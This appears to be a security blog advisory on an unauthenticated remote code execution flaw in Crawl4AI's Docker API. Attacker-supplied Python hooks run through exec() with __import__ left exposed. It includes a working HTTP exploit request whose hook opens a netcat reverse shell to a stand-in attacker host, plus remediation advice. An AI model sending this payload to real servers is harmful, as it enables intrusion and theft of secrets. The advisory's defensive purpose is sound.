Feb 16, 2026·6 min read·28 visits
Unauthenticated Remote Code Execution in Crawl4AI Docker deployments. The application allows users to define custom Python 'hooks' for web scraping. The sandbox implementation failed to block the `__import__` builtin, allowing attackers to escape the sandbox and execute system commands as the container user. Patch immediately to v0.8.0.
A Critical RCE in Crawl4AI's Docker API allows unauthenticated attackers to execute arbitrary Python code via the 'hooks' parameter. By leveraging an insecure implementation of 'exec()' and a failed attempt at sandboxing that left '__import__' exposed, attackers can bypass restrictions and compromise the host container.
In the gold rush of the AI era, data is the shovel. Crawl4AI positioned itself as the high-speed conveyor belt for that shovel, a tool designed specifically to scrape the web and feed clean data into Large Language Models (LLMs). To make this tool versatile, the developers added a feature that sounded great on paper but was catastrophic in practice: Hooks.
Hooks allow users to modify the scraping behavior on the fly. Need to strip some HTML before processing? Add a hook. Need to execute custom logic when a page loads? Add a hook. In the Docker API deployment, these hooks are passed as strings within a JSON payload.
Here is the problem: to make a hook work, the application has to execute code provided by the user. If you are a security researcher, your ears just perked up. Allowing users to send code to be executed on your server is the digital equivalent of handing a burglar your house keys and asking them to water your plants while you're on vacation. You're trusting them to only water the plants.
The developers of Crawl4AI weren't completely oblivious to the danger. They knew that running raw user code was risky, so they attempted to implement a 'sandbox'. In Python, this usually involves using exec() or eval() with a restricted scope—specifically, by limiting the globals and locals dictionaries passed to the function.
The idea is simple: if you don't give the code access to the os module or the subprocess module, it can't hurt you, right? Wrong. This is the 'blacklist' approach to security, and it almost never works in dynamic languages like Python.
The specific failure here was leaving the __import__ builtin accessible. Python's object model is introspective and powerful. Even if you remove os from the namespace, if __import__ is present, the attacker can simply say "I'd like the os module, please," and Python obliges. The sandbox was effectively a door with a heavy deadbolt but no hinges.
Let's look at what this vulnerability likely looks like under the hood. While the exact proprietary source isn't pasted here, the mechanism described is a classic Python anti-pattern. The vulnerable code handles the hooks parameter from the API request and passes it to an execution handler.
The Vulnerable Logic:
# Simplified representation of the flaw
def execute_hook(hook_code, context):
# The developer tries to be safe by defining a "safe" scope
safe_globals = {
'math': math,
'str': str,
# ... other innocuous builtins ...
# FATAL ERROR: __import__ is often available by default
# in __builtins__ unless explicitly stripped or overwritten
}
# The sink
exec(hook_code, safe_globals)Because the __builtins__ were not rigorously scrubbed (or were implicitly included), the __import__ function remained available. This meant that while the developer thought they were restricting the environment to string manipulation and basic math, they were actually providing a full shell.
The Fix (v0.8.0):
In version 0.8.0, the remediation likely involved either removing the dynamic hook execution feature entirely from the public API or implementing a significantly more robust sandboxing mechanism (though in Python, exec is rarely truly safe). The immediate recommendation is simply to upgrade, which typically sanitizes or removes this capability.
Exploiting this is trivially easy for anyone who knows Python. We don't need buffer overflows or heap spraying; we just need to ask the server nicely. The attack vector is the /crawl endpoint, specifically the hooks parameter.
Here is the kill chain:
on_execution_started.__import__('os') to load the operating system interface, then .system() or .popen() to run shell commands.The Payload:
POST /crawl HTTP/1.1
Host: target-ip:8080
Content-Type: application/json
{
"urls": ["http://google.com"],
"hooks": {
"on_execution_started": "__import__('os').system('nc -e /bin/sh attacker.com 4444')"
}
}In this scenario, as soon as the crawl job initializes, the server executes the hook. The Python interpreter resolves __import__, loads os, executes the Netcat reverse shell, and suddenly you have a terminal inside their Docker container. From there, you can dump environment variables (which often contain API keys for OpenAI, Anthropic, or AWS), modify the filesystem, or pivot to other containers on the same network.
You might be thinking, "It's just a Docker container, who cares?" You should care. In modern DevOps environments, containers are rarely isolated islands. They are often run with:
With a CVSS score of 10.0, this is a "drop everything and patch" situation. An unauthenticated RCE means that automated botnets will likely start scanning for this vulnerability to install crypto-miners or add the server to a DDoS fleet. If you are running Crawl4AI to power your LLM pipeline, an attacker could also poison your data or steal your proprietary datasets.
The mitigation is straightforward: stop using the vulnerable version. The developers released version 0.8.0 which resolves this issue. If you are running unclecode/crawl4ai in Docker, you need to pull the latest image immediately.
Remediation Steps:
docker pull unclecode/crawl4ai:latestDefense in Depth:
Beyond patching, this vulnerability highlights why you shouldn't expose internal tools to the public internet without authentication. Even if the app claims to have auth, put it behind a reverse proxy (like Nginx or Traefik) and enforce your own Basic Auth or mTLS. Never assume an internal tool is hardened against public internet threats.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
Crawl4AI unclecode | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-94 (Improper Control of Generation of Code) |
| CVSS v3.1 | 10.0 (Critical) |
| Attack Vector | Network (Unauthenticated) |
| Impact | Remote Code Execution (RCE) |
| EPSS Score | 0.20% (Rising) |
| Exploit Status | Proof of Concept Available |
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.